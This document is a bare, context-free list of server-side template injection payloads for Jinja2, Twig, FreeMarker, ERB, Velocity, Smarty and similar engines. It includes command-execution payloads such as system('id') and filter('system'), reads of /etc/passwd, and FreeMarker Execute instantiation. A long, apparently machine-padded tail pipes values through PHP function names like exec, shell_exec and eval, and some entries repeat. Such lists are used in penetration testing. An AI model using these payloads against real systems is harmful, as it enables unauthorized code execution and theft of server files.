{{7*7}}
{{7*'7'}}
${7*7}
${7*'7'}
<%= 7*7 %>
<%= 7*'7' %>
{{7*7}}${7*7}
{{config}}
{{self}}
{{_self}}
{{_self.env}}
{{app}}
{{dump(app)}}
{{cycler.__init__}}
{{joiner.__init__}}
{{namespace.__init__}}
{{lipsum.__globals__}}
{{request.application}}
{{''.__class__.__mro__}}
{{[].__class__.__mro__}}
{{().__class__.__mro__}}
{{{}).__class__.__mro__}}
{{7*7}}${7*7}<%= 7*7 %>
${{<%[%'"}}%
${1?lower_abc}
${.version}
${.data_model}
${"z".?upper_case}
#{7*7}
*{7*7}
{{7*7}}${7*7}#{7*7}
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{['id']|filter('system')}}
{{['id']|map('system')|join}}
{{_self.env.getFilters()|keys}}
{{_self.env.getVersion()}}
{{_self.env.getLoader()}}
{{_self.env.getCache()}}
{{_self.env.getCharset()}}
{{_self.env.getTemplateClassPrefix()}}
{{T(java.lang.Runtime)}}
${T(java.lang.Runtime).getRuntime()}
${"freemarker.template.utility.Execute"?new()}
${.main}
${.main?api}
${.output_encoding}
${.url_escaping_charset}
${.locale}
${.time_zone}
${.current_template_name}
${.template}
${.data_model?keys}
${.data_model?values}
{{7*7}}${7*7}#{7*7}*{7*7}
<%= ENV %>
<%= system('id') %>
<%= `id` %>
<%= File.read('/etc/passwd') %>
<%= File.open('/etc/passwd').read() %>
#{process.env}
#{root.process}
#{global.process}
#set($x=7*7)
#set($x=$class)
#set($x=$context)
#set($x=$application)
#set($x=$request)
#set($x=$response)
#set($x=$session)
*{7*7}
*{@java.lang.Runtime@getRuntime()}
*{T(java.lang.Runtime).getRuntime()}
{7*7}
{7*7}${7*7}
{php}echo 7*7;{/php}
{php}phpinfo();{/php}
{$smarty.version}
{$smarty.template}
{$smarty.const.*}
{$smarty.server.SERVER_NAME}
{$smarty.env.PATH}
{{'a'*7}}
{{'a'*'7'}}
{{7**7}}
{{7^7}}
{{7|upper}}
{{7|length}}
{{7|abs}}
{{7|round}}
{{7|trim}}
{{7|join}}
{{7|split}}
{{7|merge}}
{{7|keys}}
{{7|values}}
{{7|first}}
{{7|last}}
{{7|default('test')}}
{{7|escape}}
{{7|e}}
{{7|raw}}
{{7|safe}}
{{7|capitalize}}
{{7|lower}}
{{7|upper}}
{{7|title}}
{{7|trim}}
{{7|replace('7','9')}}
{{7|striptags}}
{{7|url_encode}}
{{7|url_decode}}
{{7|json_encode}}
{{7|json_decode}}
{{7|base64_encode}}
{{7|base64_decode}}
{{7|date}}
{{7|time}}
{{7|slice(1,2)}}
{{7|batch(2)}}
{{7|column('name')}}
{{7|filter(v => v > 5)}}
{{7|map(v => v * 2)}}
{{7|reduce((carry, v) => carry + v)}}
{{7|sort}}
{{7|reverse}}
{{7|unique}}
{{7|intersect}}
{{7|diff}}
{{7|without}}
{{7|shuffle}}
{{7|chunk(2)}}
{{7|pad(10)}}
{{7|wrap(5)}}
{{7|abort}}
{{7|exit}}
{{7|die}}
{{7|include('file')}}
{{7|extend('layout')}}
{{7|block('name')}}
{{7|parent()}}
{{7|use('macro')}}
{{7|import('macro')}}
{{7|from('file')}}
{{7|macro('name')}}
{{7|sandbox}}
{{7|merge_recursive}}
{{7|array_merge}}
{{7|array_combine}}
{{7|array_chunk}}
{{7|array_column}}
{{7|array_diff}}
{{7|array_fill}}
{{7|array_filter}}
{{7|array_flip}}
{{7|array_intersect}}
{{7|array_key_exists}}
{{7|array_keys}}
{{7|array_map}}
{{7|array_merge}}
{{7|array_pad}}
{{7|array_pop}}
{{7|array_push}}
{{7|array_rand}}
{{7|array_reduce}}
{{7|array_reverse}}
{{7|array_search}}
{{7|array_shift}}
{{7|array_slice}}
{{7|array_splice}}
{{7|array_sum}}
{{7|array_unique}}
{{7|array_unshift}}
{{7|array_values}}
{{7|array_walk}}
{{7|compact}}
{{7|count}}
{{7|each}}
{{7|extract}}
{{7|in_array}}
{{7|list}}
{{7|range}}
{{7|sizeof}}
{{7|dirname}}
{{7|basename}}
{{7|pathinfo}}
{{7|realpath}}
{{7|file_exists}}
{{7|is_file}}
{{7|is_dir}}
{{7|is_readable}}
{{7|is_writable}}
{{7|is_executable}}
{{7|file_get_contents}}
{{7|file_put_contents}}
{{7|filemtime}}
{{7|filesize}}
{{7|disk_free_space}}
{{7|disk_total_space}}
{{7|glob}}
{{7|scandir}}
{{7|opendir}}
{{7|readdir}}
{{7|closedir}}
{{7|mkdir}}
{{7|rmdir}}
{{7|unlink}}
{{7|copy}}
{{7|rename}}
{{7|touch}}
{{7|chmod}}
{{7|chown}}
{{7|chgrp}}
{{7|symlink}}
{{7|link}}
{{7|readlink}}
{{7|realpath_cache_get}}
{{7|realpath_cache_size}}
{{7|tempnam}}
{{7|tmpfile}}
{{7|parse_ini_file}}
{{7|parse_ini_string}}
{{7|http_build_query}}
{{7|parse_url}}
{{7|urlencode}}
{{7|urldecode}}
{{7|base64_encode}}
{{7|base64_decode}}
{{7|json_encode}}
{{7|json_decode}}
{{7|serialize}}
{{7|unserialize}}
{{7|md5}}
{{7|sha1}}
{{7|hash}}
{{7|password_hash}}
{{7|password_verify}}
{{7|crypt}}
{{7|openssl_encrypt}}
{{7|openssl_decrypt}}
{{7|bin2hex}}
{{7|hex2bin}}
{{7|strlen}}
{{7|strpos}}
{{7|strrpos}}
{{7|stripos}}
{{7|strripos}}
{{7|strstr}}
{{7|strchr}}
{{7|strrchr}}
{{7|substr}}
{{7|str_replace}}
{{7|str_ireplace}}
{{7|str_repeat}}
{{7|str_shuffle}}
{{7|str_split}}
{{7|str_word_count}}
{{7|strtolower}}
{{7|strtoupper}}
{{7|ucfirst}}
{{7|lcfirst}}
{{7|ucwords}}
{{7|trim}}
{{7|ltrim}}
{{7|rtrim}}
{{7|nl2br}}
{{7|wordwrap}}
{{7|htmlentities}}
{{7|htmlspecialchars}}
{{7|strip_tags}}
{{7|addslashes}}
{{7|stripslashes}}
{{7|quotemeta}}
{{7|chr}}
{{7|ord}}
{{7|printf}}
{{7|sprintf}}
{{7|sscanf}}
{{7|fscanf}}
{{7|parse_str}}
{{7|number_format}}
{{7|money_format}}
{{7|date}}
{{7|time}}
{{7|strtotime}}
{{7|mktime}}
{{7|gmmktime}}
{{7|checkdate}}
{{7|getdate}}
{{7|localtime}}
{{7|gettimeofday}}
{{7|microtime}}
{{7|uniqid}}
{{7|rand}}
{{7|mt_rand}}
{{7|getrandmax}}
{{7|mt_getrandmax}}
{{7|shuffle}}
{{7|array_rand}}
{{7|pcntl_fork}}
{{7|pcntl_wait}}
{{7|pcntl_signal}}
{{7|pcntl_exec}}
{{7|pcntl_alarm}}
{{7|posix_getpid}}
{{7|posix_getppid}}
{{7|posix_getuid}}
{{7|posix_geteuid}}
{{7|posix_getgid}}
{{7|posix_getegid}}
{{7|posix_getlogin}}
{{7|posix_getpgrp}}
{{7|posix_setsid}}
{{7|posix_setuid}}
{{7|posix_seteuid}}
{{7|posix_setgid}}
{{7|posix_setegid}}
{{7|posix_getgroups}}
{{7|posix_getpwuid}}
{{7|posix_getgrgid}}
{{7|posix_getpwnam}}
{{7|posix_getgrnam}}
{{7|posix_getpid}}
{{7|posix_kill}}
{{7|posix_times}}
{{7|posix_ctermid}}
{{7|posix_ttyname}}
{{7|posix_isatty}}
{{7|posix_uname}}
{{7|exec}}
{{7|system}}
{{7|passthru}}
{{7|shell_exec}}
{{7|popen}}
{{7|proc_open}}
{{7|proc_close}}
{{7|proc_terminate}}
{{7|proc_get_status}}
{{7|proc_nice}}
{{7|escapeshellarg}}
{{7|escapeshellcmd}}
{{7|mail}}
{{7|mb_send_mail}}
{{7|error_log}}
{{7|syslog}}
{{7|closelog}}
{{7|openlog}}
{{7|set_error_handler}}
{{7|set_exception_handler}}
{{7|restore_error_handler}}
{{7|restore_exception_handler}}
{{7|trigger_error}}
{{7|user_error}}
{{7|debug_backtrace}}
{{7|debug_print_backtrace}}
{{7|error_get_last}}
{{7|error_clear_last}}
{{7|register_shutdown_function}}
{{7|register_tick_function}}
{{7|unregister_tick_function}}
{{7|assert}}
{{7|eval}}
{{7|create_function}}
{{7|call_user_func}}
{{7|call_user_func_array}}
{{7|forward_static_call}}
{{7|forward_static_call_array}}
{{7|func_get_args}}
{{7|func_get_arg}}
{{7|func_num_args}}
{{7|function_exists}}
{{7|get_defined_functions}}
{{7|get_defined_vars}}
{{7|get_resource_type}}
{{7|gettype}}
{{7|intval}}
{{7|floatval}}
{{7|strval}}
{{7|boolval}}
{{7|doubleval}}
{{7|empty}}
{{7|isset}}
{{7|is_null}}
{{7|is_bool}}
{{7|is_int}}
{{7|is_integer}}
{{7|is_long}}
{{7|is_float}}
{{7|is_double}}
{{7|is_numeric}}
{{7|is_string}}
{{7|is_array}}
{{7|is_object}}
{{7|is_resource}}
{{7|is_scalar}}
{{7|is_callable}}
{{7|is_iterable}}
{{7|is_countable}}
{{7|class_exists}}
{{7|interface_exists}}
{{7|trait_exists}}
{{7|method_exists}}
{{7|property_exists}}
{{7|get_class}}
{{7|get_parent_class}}
{{7|get_called_class}}
{{7|get_class_methods}}
{{7|get_class_vars}}
{{7|get_object_vars}}
{{7|get_declared_classes}}
{{7|get_declared_interfaces}}
{{7|get_declared_traits}}
{{7|class_implements}}
{{7|class_parents}}
{{7|class_uses}}
{{7|spl_classes}}
{{7|spl_object_hash}}
{{7|spl_object_id}}
{{7|hrtime}}
{{7|phpversion}}
{{7|php_uname}}
{{7|php_sapi_name}}
{{7|php_ini_loaded_file}}
{{7|php_ini_scanned_files}}
{{7|phpinfo}}
{{7|get_cfg_var}}
{{7|ini_get}}
{{7|ini_get_all}}
{{7|ini_set}}
{{7|ini_alter}}
{{7|ini_restore}}
{{7|getenv}}
{{7|putenv}}
{{7|get_current_user}}
{{7|getmyuid}}
{{7|getmygid}}
{{7|getmypid}}
{{7|getmyinode}}
{{7|getlastmod}}
{{7|memory_get_usage}}
{{7|memory_get_peak_usage}}
{{7|memory_reset_peak_usage}}
{{7|sys_get_temp_dir}}
{{7|disk_free_space}}
{{7|disk_total_space}}
{{7|diskfreespace}}
{{7|set_time_limit}}
{{7|ignore_user_abort}}
{{7|sleep}}
{{7|usleep}}
{{7|time_nanosleep}}
{{7|time_sleep_until}}
{{7|uniqid}}
